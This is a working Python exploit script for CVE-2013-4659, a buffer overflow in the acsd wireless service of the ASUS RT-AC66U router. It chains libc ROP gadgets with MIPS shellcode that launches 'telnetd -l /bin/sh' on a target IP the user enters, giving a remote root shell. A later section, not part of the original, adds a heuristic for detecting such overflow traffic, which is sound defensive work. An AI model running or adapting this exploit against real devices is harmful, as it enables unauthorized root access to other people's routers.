#!/usr/bin/env python

import signal, struct
from time import sleep
from socket import *
from sys import exit, exc_info

#
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
# Discovered and Reported*June 2013
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
#*Security Analysts @ Independent Security Evaluators
# Software Vendor*********http://asus.com
# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/
# Software****************acsd wireless service (Listens on TCP/5916)
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
#
# Overview:
# The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
# Buffer Overflow attacks.
#
# Multiple overflows exist in the following software:
#
# - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)
#

def sigHandle(signum, frm):  # Signal handler
    print "\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)

def targServer():
    while True:
        try:
            server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
            server = inet_ntoa(server)
            break
        except:
            print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
            sleep(1)
            continue
    return server

def main():
    print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
 [*] Discovered and Reported: June 2013
 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
 [*] Software Vendor: http://asus.com
 [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
 [*] Software: acsd wireless service (Listens on TCP/5916)
 [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
 [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")

    signal.signal(signal.SIGINT, sigHandle)  # Setting signal handler for ctrl + c

    victim = targServer()
    port = int(5916)
    acsdCmd = "autochannel&param="  # Vulnerable command - JH

    # base address of .text section of libc.so.0 in acsd's address space
    libc_base = 0x2ab25000

    # ROP gadget #1
    # lui s0,0x2
    # li a0,1
    # move t9,s1
    # jalr t9
    # ori a1,s0,0x2
    ra1 = struct.pack("<L", libc_base + 0x2d39c)

    # ROP gadget #2
    # move t9,s3
    # lw ra,44(sp)
    # lw s4,40(sp)
    # lw s3,36(sp)
    # lw s2,32(sp)
    # lw s1,28(sp)
    # lw s0,24(sp)
    # jr t9
    s1 = struct.pack("<L", libc_base + 0x34358)

    # sleep() - used to force program context switch (cache flush)
    s3 = struct.pack("<L", libc_base + 0x2cb90)

    # ROP gadget #3
    # addiu a1,sp,24
    # lw gp,16(sp)
    # lw ra,32(sp)
    # jr ra
    # addiu sp,sp,40
    ra2 = struct.pack("<L", libc_base + 0xa1b0)

    # ROP gadget #4
    # move t9,a1
    # addiu a0,a0,56
    # jr t9
    # move a1,a2
    ra3 = struct.pack("<L", libc_base + 0x3167c)

    # jalr sp
    jalr_sp = "\x09\xf8\xa0\x03"

    JuNk = "\x42" * 510
    safeNop = "2Aa3"

    # 80 Bytes system() Shellcode by Jacob Holcomb of ISE
    # Calling system() and executing telnetd -l /bin/sh
    shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
    shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
    shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
    shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
    shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
    shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
    shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
    shellcode += "\x41\x61\x33"

    sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
    sploit += ra2 + JuNk[0:24] + jalr_sp + safeNop + ra3 + JuNk[0:4]
    sploit += safeNop + shellcode

    try:
        print "\n [*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
        sleep(1)
        exit(0)

    try:
        print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)

    try:
        print """ [*] Attempting to exploit the acsd param command.
 [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
 [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        net_sock.send(sploit)
        sleep(1)
    except:
        print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)

    try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
 [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
        net_sock.close()
    except:
        print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
        sleep(1)
        exit(0)

if __name__ == "__main__":
    main()
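A detection-side complement, added here and not part of the original exploit or of any ASUS/Broadcom code: the script above builds an `autochannel&param=` message of several hundred filler bytes, ROP addresses and shellcode, whereas a legitimate acsd request is a short printable `cmd&key=value` string. This heuristic flags acsd traffic to TCP/5916 whose argument is oversized or contains non-printable bytes, and applies to any of the three commands the header lists; the 128-byte threshold and the sample payloads are assumptions constructed for illustration, not measured buffer sizes.

```python
#!/usr/bin/env python3
"""Heuristic check for overflow-shaped acsd messages (constructed example)."""
import re
import string

ACSD_PORT = 5916              # acsd wireless channel service port
MAX_ARG_LEN = 128             # assumed sane upper bound, not the real buffer size
PRINTABLE = set(string.printable.encode())

# acsd commands look like "<cmd>&<key>=<value>", e.g. autochannel&param=...
CMD_RE = re.compile(rb"^([A-Za-z_]+)&([A-Za-z_]+)=(.*)$", re.DOTALL)


def inspect_acsd_payload(dst_port, payload):
    """Return the reasons a TCP payload looks like an acsd overflow attempt.

    An empty list means the message is either not acsd traffic or looks benign.
    """
    reasons = []
    if dst_port != ACSD_PORT:
        return reasons
    m = CMD_RE.match(payload)
    if not m:
        # Not even a well-formed command: only worth flagging when it is large.
        if len(payload) > MAX_ARG_LEN:
            reasons.append("unparseable command of %d bytes" % len(payload))
        return reasons
    cmd, key, value = m.groups()
    name = "%s&%s" % (cmd.decode(), key.decode())
    if len(value) > MAX_ARG_LEN:
        reasons.append("%s value is %d bytes" % (name, len(value)))
    nonprint = sum(1 for b in value if b not in PRINTABLE)
    if nonprint:
        # Raw addresses and shellcode show up as non-ASCII bytes in the argument.
        reasons.append("%d non-printable bytes in %s value" % (nonprint, name))
    return reasons


# Constructed samples: a plausible benign request and an exploit-shaped one
# (printable filler followed by packed little-endian addresses and code bytes).
BENIGN = b"autochannel&param=eth1"
ATTACK = (b"autochannel&param=" + b"\x42" * 510
          + b"\x58\x93\xb5\x2a" + b"\x41" * 4 + b"\x6c\x6e\x08\x3c")

if __name__ == "__main__":
    for sample in (BENIGN, ATTACK):
        print(len(sample), inspect_acsd_payload(ACSD_PORT, sample) or "benign")
```

The same function can be run over reassembled TCP stream data from a capture; it only inspects the application payload, so it needs the destination port supplied by whatever parses the packet headers.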